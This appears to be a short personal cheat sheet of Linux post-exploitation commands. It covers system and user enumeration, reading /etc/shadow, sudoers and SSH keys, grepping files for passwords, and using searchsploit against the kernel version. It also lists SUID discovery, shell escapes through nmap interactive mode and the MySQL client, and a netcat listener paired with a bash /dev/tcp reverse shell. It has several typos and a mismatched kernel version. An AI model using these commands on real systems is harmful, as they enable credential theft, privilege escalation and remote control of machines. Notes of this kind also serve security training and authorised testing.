jack9

1. System/Yser info:  uname -a, env, whoami, history, pwd
2. Who else has logged in? who, w, last
3. Are you in the Sudo file? sudo -l, cat /sudoers
4. Other super users?  grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'
5. Network info:  ifconfig -a, netstat -antup, lsof -i
6. check: ps aux, ps -ef
7. List version all: dpkg -l, httpd -V, mysql -V, python -v, ruby -V  etc...
8 Determin if any have vulnerabilities: searchsploit
9 Password hashes?  cat /etc/shadow
10. Check Task:  -ls /la /etc/cron*
11. SSH Keys?  -ls -la ~/.ssh/
12. Look for cleartext in any file:  find . -type f -maxdepth 4 | xargs grep -i "password"

$ uname -a
$ Linux linux 3.31 Ubuntu .....
$ searchsploit kernel 3.13 linux | sort -n
$ Linux Kenel 3.13 < 3.19 (Ubontu 12.04/14)   exploits/linux/local/37292.c

$ find / -perm -u=s -type f 2>/dev/null     // list network utilits
$ nmap --interactive
MySQL> ! bash    ! ls -l     ! shell
Nmap>  ! bash    !sh


mysql -u 用户名 -p密码 -h 服务器IP地址 -P 服务器端MySQL端口号 -D 数据库名


Reactive Shell:
local:  nc -lvp 4445
remote: /bin/bash -i >& /dev/tcp/localIP/4445 0>&1